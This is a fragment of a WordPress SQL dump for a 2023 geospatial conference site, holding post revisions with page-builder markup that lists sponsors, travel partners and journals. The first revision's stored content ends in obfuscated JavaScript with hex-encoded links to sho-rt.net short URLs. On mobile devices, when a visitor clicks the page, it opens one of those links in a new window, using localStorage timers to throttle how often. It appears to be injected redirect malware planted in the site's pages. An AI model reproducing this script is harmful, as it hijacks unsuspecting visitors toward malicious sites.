_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:26:42','2023-08-16 00:26:42','',3066,'https://gsw2023.com/?p=5250',0,'revision','',0),
(5251,1,'2023-08-16 00:26:55','2023-08-16 00:26:55','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145507665{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text 